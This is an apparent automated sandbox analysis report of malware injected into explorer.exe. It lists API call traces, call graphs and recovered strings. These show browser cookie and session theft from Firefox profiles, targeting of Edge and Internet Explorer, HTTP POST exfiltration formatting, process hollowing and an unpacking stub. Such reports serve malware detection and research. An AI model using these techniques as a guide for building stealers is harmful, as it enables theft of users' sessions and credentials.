                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                                      • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                      • API String ID: 2436889709-3669280581
                                                      • Opcode ID: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                      • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                                      • Opcode Fuzzy Hash: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                      • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      APIs
                                                      • lstrlen.KERNEL32(00000000), ref: 0008322D
                                                      • wsprintfA.USER32 ref: 0008329E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                                      • lstrlen.KERNEL32(00000000), ref: 000832C1
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                      • API String ID: 3430864794-1604029033
                                                      • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                      • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                                      • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                                      • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6

                                                      Control-flow Graph (graph rendering not reproduced)
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                                      • lstrcat.KERNEL32 ref: 000834AB
                                                        • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                        • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                                        • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                        • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                                        • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                        • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                                        • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                                        • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                                      • StrToIntA.SHLWAPI(?), ref: 0008352B
                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                                      • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                      • String ID: $Content-Length:$POST
                                                      • API String ID: 2960674810-114478848
                                                      • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                      • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                                      • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                                      • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                      • API String ID: 2731919298-637609321
                                                      • Opcode ID: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                      • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                                      • Opcode Fuzzy Hash: 4a60fd77e695e30bc64544faf5fe457681fedf5549bfe8e042cb7c116037b457
                                                      • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                                        • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                                        • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                                      • wsprintfW.USER32 ref: 000819F2
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                                      Strings
                                                      • POST, xrefs: 000819A0
                                                      • Accept: */*Referer: %S, xrefs: 000819E8
                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                      • API String ID: 3833683434-704803497
                                                      • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                      • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                                      • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                                      • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                                      APIs
                                                        • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                      • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                                      • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                                      • lstrcat.KERNEL32(?,?), ref: 000825D6
                                                      • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$AllocVirtual
                                                      • String ID: :authority$?$dyn_header
                                                      • API String ID: 3028025275-1785586894
                                                      • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                      • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                                      • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                                      • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                      • Process32First.KERNEL32(00000000,?), ref: 00081393
                                                      • lstrcmpi.KERNEL32(?), ref: 000813A3
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                      • String ID:
                                                      • API String ID: 868014591-0
                                                      • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                      • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                                      • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                                      • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91
                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                                      • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                                      • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                      • String ID: cookie
                                                      • API String ID: 2957667536-1295510418
                                                      • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                      • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                                      • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                                      • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                                      • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID:
                                                      • API String ID: 331459951-0
                                                      • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                      • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                                      • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                                      • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                                      • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: POST
                                                      • API String ID: 3168844106-1814004025
                                                      • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                      • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                                      • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                                      • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:3
                                                      execution_graph 1555 6d637 1556 6d62e 1555->1556 1558 6d6f8 1556->1558 1559 6d748 1556->1559 1561 6d74d 1559->1561 1560 6d835 LoadLibraryA 1560->1561 1561->1560 1563 6d884 VirtualProtect VirtualProtect 1561->1563 1565 6d879 1561->1565 1564 6d912 1563->1564 1564->1564 1565->1558 1566 6d5da 1567 6d614 1566->1567 1568 6d748 3 API calls 1567->1568 1569 6d6f8 1567->1569 1568->1569 1548 6d748 1550 6d74d 1548->1550 1549 6d835 LoadLibraryA 1549->1550 1550->1549 1552 6d884 VirtualProtect VirtualProtect 1550->1552 1554 6d879 1550->1554 1553 6d912 1552->1553 1553->1553

                                                      Callgraph

                                                      callgraph 0 Function_00061A04 1 Function_00065104 1->0 4 Function_00062C00 1->4 26 Function_00063F20 1->26 30 Function_00061C28 1->30 36 Function_00061938 1->36 37 Function_00061838 1->37 39 Function_00064C40 1->39 60 Function_00061B74 1->60 67 Function_00061C80 1->67 87 Function_00061CA0 1->87 105 Function_00061BC8 1->105 116 Function_00061BE8 1->116 2 Function_00061405 3 Function_00065300 3->1 3->3 3->37 70 Function_00064C80 3->70 3->116 12 Function_00062B14 4->12 104 Function_000629C0 4->104 4->116 5 Function_00061000 6 Function_0006370C 6->0 7 Function_0006CC0D 8 Function_0006D70A 9 Function_00061D08 110 Function_00061CD0 9->110 10 Function_00061508 11 Function_0006D416 13 Function_00062214 13->37 14 Function_00064A14 15 Function_00064C14 16 Function_00064914 16->9 16->37 55 Function_00061860 16->55 92 Function_00061EB4 16->92 17 Function_00064710 17->0 78 Function_00064094 17->78 103 Function_00063FC0 17->103 109 Function_000618D0 17->109 17->116 117 Function_000618E8 17->117 119 Function_00063CF0 17->119 123 Function_00063FF8 17->123 18 Function_00062F10 18->37 19 Function_00064B1E 20 Function_0006311C 21 Function_0006211C 22 Function_0006141D 23 Function_00063818 23->0 23->6 23->37 23->55 82 Function_00063690 23->82 23->109 113 Function_000621E4 23->113 23->117 24 Function_00063424 25 Function_00061822 42 Function_00063E4C 26->42 27 Function_00064B2E 28 Function_00064C2E 29 Function_0006D42D 31 Function_0006D637 43 Function_0006D748 31->43 32 Function_00063C3C 45 Function_00063B48 32->45 49 Function_0006345C 32->49 32->117 33 Function_0006343C 34 Function_00064A38 34->9 34->37 34->92 35 Function_00062838 38 Function_00064C42 39->9 39->16 39->34 39->37 39->92 97 Function_00064ABC 39->97 40 Function_00064540 68 Function_00064280 40->68 40->103 40->116 41 Function_0006624F 42->37 42->55 43->8 44 Function_00063048 44->37 45->18 63 Function_0006317C 45->63 46 Function_00061254 47 Function_00062754 48 
Function_00064B5E 49->37 75 Function_0006188C 49->75 49->116 50 Function_00064C5C 51 Function_00062964 83 Function_0006299C 51->83 52 Function_0006CD63 53 Function_00063F60 53->13 53->55 72 Function_0006268C 53->72 53->117 54 Function_00061560 55->116 56 Function_00064B6F 57 Function_0006156C 58 Function_00062368 58->36 58->37 58->55 58->75 85 Function_00062298 58->85 58->109 122 Function_000618F8 58->122 59 Function_00061576 61 Function_0006D57E 62 Function_0006497F 63->20 63->44 63->55 79 Function_00063094 63->79 63->109 64 Function_0006277C 64->47 64->51 64->109 65 Function_00064A7C 66 Function_00062F84 68->0 68->37 68->55 69 Function_00064680 69->68 69->103 69->116 70->21 70->37 70->55 70->64 74 Function_00061A8C 70->74 84 Function_00063D9C 70->84 108 Function_000628D4 70->108 70->116 71 Function_0006628F 72->37 72->55 72->58 73 Function_00061D8C 75->37 76 Function_00063B8C 76->0 76->45 76->49 76->117 77 Function_00062F88 78->0 78->37 78->55 78->123 79->37 79->55 79->77 80 Function_0006CD92 81 Function_00063A90 81->13 81->55 81->72 81->117 82->0 86 Function_000644A4 86->78 86->103 86->119 88 Function_00064BA0 89 Function_00063CAC 89->49 90 Function_00064AA9 91 Function_0006CFB7 92->37 92->55 92->73 94 Function_00061DB0 92->94 93 Function_000614B2 94->37 94->55 94->73 94->92 95 Function_00061FB0 96 Function_00064BB0 97->9 97->37 107 Function_00061FD4 97->107 98 Function_0006D0BB 99 Function_00064BB8 100 Function_000649C6 101 Function_0006D4C4 102 Function_0006D0C3 106 Function_000614D4 107->37 107->55 107->95 107->107 108->35 108->47 108->116 111 Function_000672D0 112 Function_0006D5DA 112->43 114 Function_0006CCE2 115 Function_000645E0 115->68 115->103 115->116 118 Function_00063AF0 118->23 120 Function_000635FC 118->120 119->24 119->32 119->33 119->76 119->89 119->116 119->118 120->55 120->116 121 Function_000649FA 123->0 124 Function_000614F9

                                                      Control-flow Graph

                                                      control_flow_graph 104 65300-65310 call 61be8 107 65312-65345 call 61838 104->107 108 65390-65395 104->108 112 65347 call 61838 107->112 113 65371-6538a NtUnmapViewOfSection 107->113 119 6534c-65365 112->119 115 6539c-653ab call 65104 113->115 116 6538c-6538e 113->116 123 653b5-653be 115->123 124 653ad-653b0 call 65300 115->124 116->108 117 65396-6539b call 64c80 116->117 117->115 119->113 124->123
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 00065378
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                      • Instruction ID: a41e593be866e3ab021910bfc825c372ad5ca9bfff955d7c7ff76e928a4655b8
                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                      • Instruction Fuzzy Hash: 5311C630601D094FEB9DFBB998992B933D6EB14312F54053AE415C73A2EE698B808340

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00061B74: OpenFileMappingA.KERNEL32 ref: 00061B8B
                                                        • Part of subcall function 00061B74: MapViewOfFile.KERNEL32 ref: 00061BAA
                                                      • SysFreeMap.PGOCR ref: 000651A9
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000651B3
                                                      • Process32First.KERNEL32 ref: 000651D6
                                                      • lstrcmpi.KERNEL32 ref: 000651F1
                                                      • Process32Next.KERNEL32 ref: 000652D9
                                                      • CloseHandle.KERNELBASE ref: 000652EA
                                                      • SleepEx.KERNEL32 ref: 000652F5
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3402289966-0
                                                      • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                      • Instruction ID: a6da5bda8c7869cbd6e8df023e30412e059deaad76ffb23e04c0e8a9e63b4105
                                                      • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                      • Instruction Fuzzy Hash: 08515730204E098FDB59EF68DCA5AE973E3FB95301F444619E457C71A2DF78DA058781

                                                      Control-flow Graph

                                                      control_flow_graph 48 6d748-6d74b 49 6d755-6d759 48->49 50 6d765 49->50 51 6d75b-6d763 49->51 52 6d767 50->52 53 6d74d-6d753 50->53 51->50 54 6d76a-6d771 52->54 53->49 56 6d773-6d77b 54->56 57 6d77d 54->57 56->57 57->54 58 6d77f-6d782 57->58 59 6d797-6d7a4 58->59 60 6d784-6d792 58->60 72 6d7a6-6d7a8 59->72 73 6d7be-6d7cc call 6d70a 59->73 61 6d794-6d795 60->61 62 6d7ce-6d7e9 60->62 61->59 63 6d81a-6d81d 62->63 65 6d822-6d829 63->65 66 6d81f-6d820 63->66 68 6d82f-6d833 65->68 67 6d801-6d805 66->67 70 6d807-6d80a 67->70 71 6d7eb-6d7ee 67->71 74 6d884-6d88d 68->74 75 6d835-6d84e LoadLibraryA 68->75 70->65 76 6d80c-6d810 70->76 71->65 80 6d7f0 71->80 77 6d7ab-6d7b2 72->77 73->49 81 6d890-6d899 74->81 79 6d84f-6d856 75->79 84 6d812-6d819 76->84 85 6d7f1-6d7f5 76->85 93 6d7b4-6d7ba 77->93 94 6d7bc 77->94 79->68 87 6d858-6d86e 79->87 80->85 82 6d8be-6d90e VirtualProtect * 2 81->82 83 6d89b-6d89d 81->83 91 6d912-6d917 82->91 88 6d8b0-6d8bc 83->88 89 6d89f-6d8ae 83->89 84->63 85->67 92 6d7f7-6d7f9 85->92 99 6d870-6d877 87->99 100 6d879-6d883 87->100 88->89 89->81 91->91 95 6d919-6d928 91->95 92->67 97 6d7fb-6d7ff 92->97 93->94 94->73 94->77 97->67 97->70 99->79
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0006D847
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006D8E5
                                                      • VirtualProtect.KERNELBASE ref: 0006D903
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.000000000006C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_6c000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                      • Instruction ID: fb22e33ff937d24d93fb2efd063ba145730d0834d4eb26fcdd67a2d867c28293
                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                      • Instruction Fuzzy Hash: 23515A32B5891D4FCB24AA3C9CC87F9B7D2F755325B58063BC49AC3285EE58D84683C2

                                                      Control-flow Graph

                                                      control_flow_graph 101 61b74-61b94 OpenFileMappingA 102 61b96-61bb4 MapViewOfFile 101->102 103 61bb7-61bc4 101->103 102->103
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.628348021.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                      • Instruction ID: ddaee3d7e8f9e73a22afb263a5f2562a7b1b5803ba9d96df92eae33d24df65e4
                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                      • Instruction Fuzzy Hash: A5F01C35318F094FAB44EF7C9C8C576B7E1EBA8202B048A7EA95AC7165EF74C8818751

                                                      Execution Graph

                                                      Execution Coverage:10.3%
                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:306
                                                      Total number of Limit Nodes:42
                                                      execution_graph 985 c245e lstrlen 986 c24a5 985->986 987 c2476 CryptBinaryToStringA 985->987 987->986 988 c2489 987->988 991 c2861 GetProcessHeap RtlAllocateHeap 988->991 990 c2494 CryptBinaryToStringA 990->986 991->990 707 c7728 708 c774b 707->708 713 c7904 707->713 709 c789f VirtualProtect VirtualProtect 708->709 710 c785a LoadLibraryA 708->710 709->713 715 c7871 710->715 712 c7883 GetProcAddress 714 c7899 712->714 712->715 715->708 715->712 998 c1425 999 c144b 998->999 1000 c1432 998->1000 1001 c2608 VirtualQuery 1000->1001 1002 c143a 1001->1002 1002->999 1003 c1493 23 API calls 1002->1003 1003->999 1004 c2806 VirtualFree 1005 c1eb6 1006 c1ecc lstrlen 1005->1006 1007 c1ed9 1005->1007 1006->1007 1016 c2861 GetProcessHeap RtlAllocateHeap 1007->1016 1009 c1ee1 lstrcat 1010 c1f1d 1009->1010 1011 c1f16 lstrcat 1009->1011 1017 c1f4a 1010->1017 1011->1010 1014 c2843 3 API calls 1015 c1f40 1014->1015 1016->1009 1051 c22b8 1017->1051 1021 c1f77 1056 c27e2 lstrlen MultiByteToWideChar 1021->1056 1023 c1f86 1057 c2374 RtlZeroMemory 1023->1057 1026 c1fd8 RtlZeroMemory 1028 c200d 1026->1028 1027 c2843 3 API calls 1029 c1f2d 1027->1029 1032 c229a 1028->1032 1034 c203b 1028->1034 1059 c22e5 1028->1059 1029->1014 1031 c2280 1031->1032 1033 c2843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 